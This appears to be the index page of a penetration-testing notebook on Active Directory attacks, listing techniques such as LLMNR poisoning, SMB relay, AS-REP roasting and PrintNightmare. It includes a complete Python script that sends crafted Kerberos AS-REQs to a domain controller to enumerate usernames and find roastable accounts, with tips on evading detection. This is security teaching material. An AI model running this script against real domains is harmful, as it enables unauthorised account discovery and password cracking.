Initial Attack Vectors

Internal:
---------
Attack vectors that are ideal for internal penetration tests, where the attacker plants a device on the network or uploads tools to a compromised host.

External:
---------
Attack vectors that could work in both internal and external penetration tests. Refer to this notebook for tips and tricks on network pivoting, proxying, and port forwarding through compromised hosts:

https://notes.benheater.com/books/network-pivoting

Enumerating Hosts and Identifying the Domain Controllers

Enumerating Live Hosts Internal ARP-Scan Since this is an internal assessment, Kali is on the ...

LLMNR Poisoning (Internal)

Note: Network Environment Given that LLMNR is a name resolution protocol that works on the Local...

SMB Relay (Internal/External)

Note: Network Environment This attack works best in a flat network. However, as long as the atta...

IPv6 DNS Spoofing (Internal)

Note: Network Environment This spoofing attack works by sending a router announcement to mul...

NULL Session Enumeration (Internal/External)

NULL Session LDAP, SMB, and RPC may allow a user to authenticate to the service without providin...

Using Faketime for Ad-Hoc Kerberos Authentication

Installing Faketime sudo apt install faketime faketime -h This will run the specified 'progr...

Kerberos Pre-Auth Username Enumeration

How it Works We can send a request for a TGT --- without a pre-authentication hash --- to the Ke...

AS-REP Roasting (Internal/External)

AS-REP Roasting If Kerberos pre-authentication is disabled on a user account in Active Directory...
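The two entries above (pre-auth username enumeration and AS-REP roasting) rely on the same exchange: one AS-REQ with no pre-authentication data, and a KDC reply that differs depending on whether the account exists and whether pre-auth is enforced. The script below is an added example, not code from this notebook: it hand-rolls the DER for a bare AS-REQ per RFC 4120, sends it over TCP/88, and classifies the reply. The KDC address, realm and usernames are placeholders you supply; `fake_krb_error` builds constructed replies so the classifier can be exercised offline.

```python
# Added example (not the notebook's code): send one AS-REQ with no
# pre-authentication data to a KDC and read the reply.  KDC host, realm and
# usernames are placeholders; the DER encoding is hand-rolled from RFC 4120.
import os
import socket

AS_REQ, AS_REP, KRB_ERROR = 10, 11, 30          # msg-type / APPLICATION tags
KDC_ERR_C_PRINCIPAL_UNKNOWN = 6                 # no such user
KDC_ERR_CLIENT_REVOKED = 18                     # user exists, disabled or locked out
KDC_ERR_PREAUTH_REQUIRED = 25                   # user exists, pre-auth enforced

def der(tag, body):
    """Minimal DER TLV: single-byte tag, body up to 65535 bytes."""
    n = len(body)
    if n < 0x80:
        length = bytes([n])
    elif n < 0x100:
        length = b"\x81" + bytes([n])
    else:
        length = b"\x82" + n.to_bytes(2, "big")
    return bytes([tag]) + length + body

def ctx(n, body):
    """Context-specific constructed tag [n] around an already-encoded body."""
    return der(0xA0 | n, body)

def der_int(v):
    size = max(1, (v.bit_length() + 8) // 8)
    return der(0x02, v.to_bytes(size, "big", signed=True))

def principal(name_type, *parts):
    names = b"".join(der(0x1B, p.encode()) for p in parts)   # GeneralString
    return der(0x30, ctx(0, der_int(name_type)) + ctx(1, der(0x30, names)))

def build_as_req(user, realm):
    """AS-REQ whose KDC-REQ carries no padata [3], i.e. no PA-ENC-TIMESTAMP."""
    body = der(0x30, b"".join([
        ctx(0, der(0x03, b"\x00\x40\x80\x00\x10")),   # kdc-options: forwardable, renewable, renewable-ok
        ctx(1, principal(1, user)),                     # cname, NT-PRINCIPAL
        ctx(2, der(0x1B, realm.encode())),              # realm
        ctx(3, principal(2, "krbtgt", realm)),          # sname, NT-SRV-INST
        ctx(5, der(0x18, b"20370913024805Z")),          # till, GeneralizedTime
        ctx(7, der_int(int.from_bytes(os.urandom(4), "big") >> 1)),  # nonce
        ctx(8, der(0x30, der_int(18) + der_int(23))),   # etype: AES256-CTS, RC4-HMAC
    ]))
    req = der(0x30, ctx(1, der_int(5)) + ctx(2, der_int(AS_REQ)) + ctx(4, body))
    return der(0x60 | AS_REQ, req)                      # [APPLICATION 10]

def parse_tlv(buf, pos=0):
    """Return (tag, value, next_pos) for the DER TLV starting at buf[pos]."""
    tag, first, pos = buf[pos], buf[pos + 1], pos + 2
    if first & 0x80:
        nbytes = first & 0x7F
        length = int.from_bytes(buf[pos:pos + nbytes], "big")
        pos += nbytes
    else:
        length = first
    return tag, buf[pos:pos + length], pos + length

def krb_error_code(msg):
    """error-code [6] from a KRB-ERROR, which is [APPLICATION 30] SEQUENCE {...}."""
    _, seq, _ = parse_tlv(msg)
    _, fields, _ = parse_tlv(seq)
    pos = 0
    while pos < len(fields):
        tag, val, pos = parse_tlv(fields, pos)
        if tag == 0xA6:
            return int.from_bytes(parse_tlv(val)[1], "big", signed=True)
    return None

def classify(reply):
    """What the KDC's answer to a bare AS-REQ says about the username."""
    msg_type = reply[0] & 0x1F
    if msg_type == AS_REP:
        return "exists, pre-auth disabled: AS-REP roastable"
    if msg_type == KRB_ERROR:
        code = krb_error_code(reply)
        return {KDC_ERR_C_PRINCIPAL_UNKNOWN: "does not exist",
                KDC_ERR_PREAUTH_REQUIRED: "exists",
                KDC_ERR_CLIENT_REVOKED: "exists, disabled or locked out",
                }.get(code, f"unexpected error-code {code}")
    return "unrecognised reply"

def recv_exact(sock, n):
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("KDC closed the connection early")
        buf += chunk
    return buf

def probe(kdc, user, realm, timeout=5):
    """One request over TCP/88 with the 4-byte length prefix (RFC 4120 7.2.2)."""
    req = build_as_req(user, realm)
    with socket.create_connection((kdc, 88), timeout=timeout) as s:
        s.sendall(len(req).to_bytes(4, "big") + req)
        reply = recv_exact(s, int.from_bytes(recv_exact(s, 4), "big"))
    return classify(reply)

def fake_krb_error(code):
    """Constructed KRB-ERROR (pvno, msg-type, error-code only) for offline runs."""
    fields = ctx(0, der_int(5)) + ctx(1, der_int(KRB_ERROR)) + ctx(6, der_int(code))
    return der(0x60 | KRB_ERROR, der(0x30, fields))

if __name__ == "__main__":
    for code in (KDC_ERR_C_PRINCIPAL_UNKNOWN, KDC_ERR_PREAUTH_REQUIRED, KDC_ERR_CLIENT_REVOKED):
        print(code, "->", classify(fake_krb_error(code)))
    # Against a real DC (placeholder values): print(probe("10.0.0.5", "jdoe", "CORP.LOCAL"))
```

Run `probe()` once per candidate username against the DC: `KDC_ERR_PREAUTH_REQUIRED` confirms the account exists, `KDC_ERR_C_PRINCIPAL_UNKNOWN` rules it out, and a full AS-REP means pre-auth is disabled, so the enc-part of that reply is what you would hand to a cracker. Every bare AS-REQ shows up as event 4768 on the DC, so keep the list short on an engagement where stealth matters.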

Passback Attacks (Internal/External)

What's the Flaw? Usually involves an unsecure device -- like a printer or multifunction device -...

PrintNightmare (Internal/External)

Remote Code Execution https://github.com/cube0x0/CVE-2021-1675 Contains full details on scannin...

NTLM Credential Stuffing (Internal/External)

NTLM Basic Authentication Could obtain a list of usernames via OSINT, or via something like RI...